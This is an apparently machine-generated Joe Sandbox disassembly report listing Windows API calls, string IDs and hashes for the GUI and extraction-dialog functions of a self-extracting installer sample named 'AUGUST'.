                                          • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle$|wA
                                          • API String ID: 2725485552-3187639848
                                          • Opcode ID: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                          • Instruction ID: a5d789275b7dd46d140941e9fd319bf554fc7ea6ad5da08365fcb0f0a182a74d
                                          • Opcode Fuzzy Hash: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                          • Instruction Fuzzy Hash: 4251B5F1A402047EDB10BB619D86EFF36ACDA85308B64443BF904F32C1E6BC5E854A6D
                                          APIs
                                          • GetClassNameA.USER32(?,?,00000040), ref: 00402DD3
                                          • lstrcmpiA.KERNEL32(?,STATIC), ref: 00402DE6
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00402DF3
                                            • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                            • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                            • Part of subcall function 00401A85: CharUpperW.USER32(?,7622E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                            • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402E20
                                          • GetParent.USER32(?), ref: 00402E2E
                                          • LoadLibraryA.KERNEL32(riched20), ref: 00402E42
                                          • GetMenu.USER32(?), ref: 00402E55
                                          • SetThreadLocale.KERNEL32(00000419), ref: 00402E62
                                          • CreateWindowExW.USER32(00000000,RichEdit20W,0041335C,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 00402E92
                                          • DestroyWindow.USER32(?), ref: 00402EA3
                                          • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00402EB8
                                          • GetSysColor.USER32(0000000F), ref: 00402EBC
                                          • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00402ECA
                                          • SendMessageW.USER32(00000000,00000461,?,?), ref: 00402EF5
                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402EFA
                                          • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402F02
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: Window$??3@MessageSend$CharTextUpper$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                          • String ID: RichEdit20W$STATIC$riched20${\rtf
                                          • API String ID: 1731037045-2281146334
                                          • Opcode ID: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                          • Instruction ID: c7c9ca1f65d7473fe19c29f8272bdbb18bb8b251efb89c9ee4785ec66c96c850
                                          • Opcode Fuzzy Hash: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                          • Instruction Fuzzy Hash: FE316072A40119BFDB01AFA5DD49DEF7BBCEF08745F104036F601B21D1DA789A008B68
                                          APIs
                                          • GetWindowDC.USER32(00000000), ref: 00401CD4
                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                          • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                          • GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                          • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                          • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                          • CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                          • CreateCompatibleDC.GDI32(?), ref: 00401D52
                                          • SelectObject.GDI32(00000000,?), ref: 00401D60
                                          • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                          • SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                          • SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                          • GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                          • SelectObject.GDI32(00000000,?), ref: 00401DB3
                                          • SelectObject.GDI32(00000000,?), ref: 00401DB9
                                          • DeleteDC.GDI32(00000000), ref: 00401DC2
                                          • DeleteDC.GDI32(00000000), ref: 00401DC5
                                          • ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                          • ReleaseDC.USER32(00000000,?), ref: 00401DDB
                                          • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401DE8
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                          • String ID:
                                          • API String ID: 3462224810-0
                                          • Opcode ID: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                          • Instruction ID: 24730f8ff9b6a3f8d7f0600a39c6f646a54ca28d21b12e05547a6914d757f366
                                          • Opcode Fuzzy Hash: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                          • Instruction Fuzzy Hash: 00313976D00208BBDF215FA19C48EEFBFBDEB48752F108066F604B21A0C6758A50EB64
                                          APIs
                                          • GetClassNameA.USER32(?,?,00000040), ref: 00401E05
                                          • lstrcmpiA.KERNEL32(?,STATIC), ref: 00401E1C
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00401E2F
                                          • GetMenu.USER32(?), ref: 00401E44
                                            • Part of subcall function 00401BDF: GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                            • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                            • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                            • Part of subcall function 00401BDF: SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                            • Part of subcall function 00401BDF: LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                            • Part of subcall function 00401BDF: LockResource.KERNEL32(00000000), ref: 00401C41
                                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00401E76
                                          • memcpy.MSVCRT(00000000,00000000,00000010), ref: 00401E83
                                          • CoInitialize.OLE32(00000000), ref: 00401E8C
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00401E98
                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00414C14,?), ref: 00401EBD
                                          • GlobalFree.KERNEL32(00000000), ref: 00401ECD
                                            • Part of subcall function 00401CC8: GetWindowDC.USER32(00000000), ref: 00401CD4
                                            • Part of subcall function 00401CC8: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                            • Part of subcall function 00401CC8: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                            • Part of subcall function 00401CC8: GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                            • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                            • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                            • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                            • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D52
                                            • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401D60
                                            • Part of subcall function 00401CC8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                            • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                            • Part of subcall function 00401CC8: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                            • Part of subcall function 00401CC8: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                            • Part of subcall function 00401CC8: GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                            • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB3
                                            • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB9
                                            • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC2
                                            • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC5
                                            • Part of subcall function 00401CC8: ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00401EFF
                                          • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 00401F13
                                          • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00401F25
                                          • GlobalFree.KERNEL32(00000000), ref: 00401F3A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                          • String ID: IMAGES$STATIC
                                          • API String ID: 4202116410-1168396491
                                          • Opcode ID: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                          • Instruction ID: 08c73d75f8249df6a552952f3d33af28cabbedea74541c6d0cfd8ce2793c0c4e
                                          • Opcode Fuzzy Hash: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                          • Instruction Fuzzy Hash: C7417C71A00218BFCB11DFA1DC49DEEBF7DEF08742B008076FA05A61A0DB758A41DB68
                                          APIs
                                            • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                            • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                          • GetDlgItem.USER32(?,000004B8), ref: 0040816A
                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408179
                                          • GetDlgItem.USER32(?,000004B5), ref: 004081C0
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 004081C5
                                          • GetDlgItem.USER32(?,000004B5), ref: 004081D5
                                          • SetWindowLongW.USER32(00000000), ref: 004081D8
                                          • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004081FE
                                          • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408210
                                          • GetDlgItem.USER32(?,000004B4), ref: 0040821A
                                          • SetFocus.USER32(00000000), ref: 0040821D
                                          • SetTimer.USER32(?,00000001,00000000,00000000), ref: 0040824C
                                          • CoCreateInstance.OLE32(00414C34,00000000,00000001,00414808,00000000), ref: 00408277
                                          • GetDlgItem.USER32(?,00000002), ref: 00408294
                                          • IsWindow.USER32(00000000), ref: 00408297
                                          • GetDlgItem.USER32(?,00000002), ref: 004082A7
                                          • EnableWindow.USER32(00000000), ref: 004082AA
                                          • GetDlgItem.USER32(?,000004B5), ref: 004082BE
                                          • ShowWindow.USER32(00000000), ref: 004082C1
                                            • Part of subcall function 00407134: GetDlgItem.USER32(?,000004B6), ref: 00407142
                                            • Part of subcall function 00407B33: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
                                            • Part of subcall function 00407B33: GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                            • Part of subcall function 00407B33: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                            • Part of subcall function 00407B33: wsprintfW.USER32 ref: 00407BBB
                                            • Part of subcall function 00407B33: ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                            • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                            • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                            • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                            • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                            • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                            • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                            • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                            • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                            • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                            • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: Item$Window$MessageSend$System$EnableHandleLoadLongMenuMetricsModuleShow$??3@CreateFocusIconImageInstanceTimerUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                          • String ID:
                                          • API String ID: 855516470-0
                                          • Opcode ID: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                          • Instruction ID: 3ce0214ef3d03b0ee840dd4ab9c121ae631e901bc0d6870238ad5b6e85178a64
                                          • Opcode Fuzzy Hash: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                          • Instruction Fuzzy Hash: 014174B0644748ABDA206F65DD49F5B7BADEB40B05F00847DF552A62E1CB79B800CA1C
                                          APIs
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,hAA,00000000), ref: 004030F6
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,hAA,00000000), ref: 004030FE
                                          • strncmp.MSVCRT ref: 004031F1
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00403255
                                          • lstrcmpW.KERNEL32(?,SetEnvironment,00000000), ref: 00403273
                                          • ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??3@$lstrcmpstrncmp
                                          • String ID: GUIFlags$MiscFlags$SetEnvironment$hAA${\rtf
                                          • API String ID: 2881732429-172299233
                                          • Opcode ID: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                          • Instruction ID: da55d09168dcf28f6e950782b6654b171f18f9ca5632fa18d2c46afc5d57570a
                                          • Opcode Fuzzy Hash: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                          • Instruction Fuzzy Hash: 23819D31900218ABDF11DFA1CD55BEE7B78AF14305F1040ABE8017B2E6DB78AB05DB59
                                          APIs
                                          • GetDlgItem.USER32(?,000004B3), ref: 00406A69
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00406A6E
                                          • GetDlgItem.USER32(?,000004B4), ref: 00406AA5
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00406AAA
                                          • GetSystemMetrics.USER32(00000010), ref: 00406B0B
                                          • GetSystemMetrics.USER32(00000011), ref: 00406B11
                                          • GetSystemMetrics.USER32(00000008), ref: 00406B18
                                          • GetSystemMetrics.USER32(00000007), ref: 00406B1F
                                          • GetParent.USER32(?), ref: 00406B43
                                          • GetClientRect.USER32(00000000,?), ref: 00406B55
                                          • ClientToScreen.USER32(?,?), ref: 00406B68
                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00406BCE
                                          • GetClientRect.USER32(?,?), ref: 00406C55
                                          • ClientToScreen.USER32(?,?), ref: 00406B71
                                            • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                          • GetSystemMetrics.USER32(00000008), ref: 00406CD6
                                          • GetSystemMetrics.USER32(00000007), ref: 00406CDD
                                            • Part of subcall function 00406A18: GetDlgItem.USER32(?,?), ref: 00406A36
                                            • Part of subcall function 00406A18: SetWindowPos.USER32(00000000), ref: 00406A3D
                                          Similarity
                                          • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                          • String ID:
                                          • API String ID: 747815384-0
                                          • Opcode ID: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                          • Instruction ID: 701d8c843d4ec3579feae24e97f284edc15b0bac0439a5efdbaa5111af673c9b
                                          • Opcode Fuzzy Hash: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                          • Instruction Fuzzy Hash: 7B912D71A00209AFDB14DFB9CD85AEEB7F9EF48704F148529E642F6290D778E9008B64
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                          • LoadIconW.USER32(00000000), ref: 00407D33
                                          • GetSystemMetrics.USER32(00000032), ref: 00407D43
                                          • GetSystemMetrics.USER32(00000031), ref: 00407D48
                                          • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                          • LoadImageW.USER32(00000000), ref: 00407D54
                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                          • SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                          • GetWindow.USER32(?,00000005), ref: 00407E76
                                          • GetWindow.USER32(?,00000005), ref: 00407E92
                                          • GetWindow.USER32(?,00000005), ref: 00407EAA
                                          • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,0040803E), ref: 00407F0A
                                          • LoadIconW.USER32(00000000), ref: 00407F0D
                                          • GetDlgItem.USER32(?,000004B1), ref: 00407F28
                                          • SendMessageW.USER32(00000000), ref: 00407F2F
                                            • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                            • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                            • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                            • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                          Similarity
                                          • API ID: Window$HandleItemLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                          • String ID:
                                          • API String ID: 1889686859-0
                                          • Opcode ID: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                                          • Instruction ID: b6a50195b8a608de49edc5b96f3e83ee8a9b90890169e94b1220211b89b9884f
                                          • Opcode Fuzzy Hash: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                                          • Instruction Fuzzy Hash: E861D47064C7096AE9257B61DC4AF3B3699AB40B05F10447FF642B92D2DBBCBC0056AF
                                          APIs
                                          • GetParent.USER32(?), ref: 00406F45
                                          • GetWindowLongW.USER32(00000000), ref: 00406F4C
                                          • DefWindowProcW.USER32(?,?,?,?), ref: 00406F62
                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 00406F7F
                                          • GetSystemMetrics.USER32(00000031), ref: 00406F91
                                          • GetSystemMetrics.USER32(00000032), ref: 00406F98
                                          • GetWindowDC.USER32(?), ref: 00406FAA
                                          • GetWindowRect.USER32(?,?), ref: 00406FB7
                                          • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00406FEB
                                          • ReleaseDC.USER32(?,00000000), ref: 00406FF3
                                          Similarity
                                          • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                          • String ID:
                                          • API String ID: 2586545124-0
                                          • Opcode ID: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                          • Instruction ID: b1ff7c23223d170b9333fa97acec74f2c9230ee3eabfe87d0be763292bfdf634
                                          • Opcode Fuzzy Hash: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                          • Instruction Fuzzy Hash: 8E210C7650021ABFCF01AFA8DD48DDF7F69FB08351F008565FA15E21A0C775EA209B64
                                          APIs
                                          • GetDlgItem.USER32(?,000004B3), ref: 0040678E
                                          • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067A1
                                          • GetDlgItem.USER32(?,000004B4), ref: 004067AB
                                          • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067B3
                                          • SendMessageW.USER32(?,00000401,?,00000000), ref: 004067C3
                                          • GetDlgItem.USER32(?,?), ref: 004067CC
                                          • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004067D4
                                          • GetDlgItem.USER32(?,?), ref: 004067DD
                                          • SetFocus.USER32(00000000,?,000004B4,76230E50,00407E06,000004B4,000004B3,00000000,000004B4,00000000,000004B2,?,000004B7), ref: 004067E0
                                          Similarity
                                          • API ID: ItemMessageSend$Focus
                                          • String ID:
                                          • API String ID: 3946207451-0
                                          • Opcode ID: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                          • Instruction ID: e7a8c5b21de344c7c4c5496bf688f1d5cc3ba414acf11b32f4788b893cc62525
                                          • Opcode Fuzzy Hash: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                          • Instruction Fuzzy Hash: 6FF04F712403087BEA212B61DD86F5BBA6EEF81B45F018425F340650F0CBF7EC109A28
                                          APIs
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0040C603
                                          Strings
                                          Similarity
                                          • API ID: ??3@
                                          • String ID: IA$IA$IA$IA$IA$IA
                                          • API String ID: 613200358-3743982587
                                          • Opcode ID: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
                                          • Instruction ID: 4cebfcab61734def35128a955d6a3e34031d8899c11ca8f9bd2aeb72941b6852
                                          • Opcode Fuzzy Hash: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
                                          • Instruction Fuzzy Hash: D2221671900248DFCB24EF65C8D09EEBBB5FF48304F50852EE91AA7291DB38A945CF58
                                          APIs
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,00417788,00000000,SetEnvironment), ref: 00408479
                                          Strings
                                          Similarity
                                          • API ID: ??3@
                                          • String ID: BeginPrompt$ErrorTitle$FinishMessage$HelpText$SetEnvironment$WarningTitle
                                          • API String ID: 613200358-994561823
                                          • Opcode ID: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
                                          • Instruction ID: 5566f9f9667118f06bc812855c9affabb63102f3a10b3971892d5eca1131561f
                                          • Opcode Fuzzy Hash: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
                                          • Instruction Fuzzy Hash: CA51D47080420AAACF24AB559E85AFB7774EB20348F54443FF881722E1EF7D5D82D64E
                                          APIs
                                          • memcpy.MSVCRT(?,00417410,00000160), ref: 00406DD1
                                          • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00406DF0
                                          • GetDC.USER32(00000000), ref: 00406DFB
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00406E07
                                          • MulDiv.KERNEL32(?,00000048,00000000), ref: 00406E16
                                          • ReleaseDC.USER32(00000000,?), ref: 00406E24
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00406E4C
                                          • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_0000667A), ref: 00406E81
                                          Similarity
                                          • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                          • String ID:
                                          • API String ID: 2693764856-0
                                          • Opcode ID: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                          • Instruction ID: b2c1943609947f3a034a1f42a4fd453b3666a2b5c4d4ccfd9a1c2059c5c1cb6f
                                          • Opcode Fuzzy Hash: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                          • Instruction Fuzzy Hash: C32184B5500218BFDB215F61DC45EEB7B7CFB08746F0040B6F609A1190D7748E948B65
                                          APIs
                                          • GetDC.USER32(?), ref: 0040696E
                                          • GetSystemMetrics.USER32(0000000B), ref: 0040698A
                                          • GetSystemMetrics.USER32(0000003D), ref: 00406993
                                          • GetSystemMetrics.USER32(0000003E), ref: 0040699B
                                          • SelectObject.GDI32(?,?), ref: 004069B8
                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004069D3
                                          • SelectObject.GDI32(?,?), ref: 004069F9
                                          • ReleaseDC.USER32(?,?), ref: 00406A08
                                          Similarity
                                          • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                          • String ID:
                                          • API String ID: 2466489532-0
                                          • Opcode ID: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                          • Instruction ID: 7c755332e1b278278a0584394201b19561512224090c74d51841a9ad660c27ee
                                          • Opcode Fuzzy Hash: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                          • Instruction Fuzzy Hash: 6B216871900209EFCB119F65DD84A8EBFF4EF08321F10C46AE559A72A0C7359A50DF40
                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
                                          • GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                          • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                          • wsprintfW.USER32 ref: 00407BBB
                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                          Strings
                                          Similarity
                                          • API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                          • String ID: %d%%
                                          • API String ID: 3753976982-1518462796
                                          • Opcode ID: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
                                          • Instruction ID: b955b8041d8a67620c3180d4911c799512bd6939d195f5b55c3092177650065a
                                          • Opcode Fuzzy Hash: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
                                          • Instruction Fuzzy Hash: 1D31D371904208BBDB11AFA0CC45EDA7BB9EF48708F10847AFA42B61E1D779B904CB59
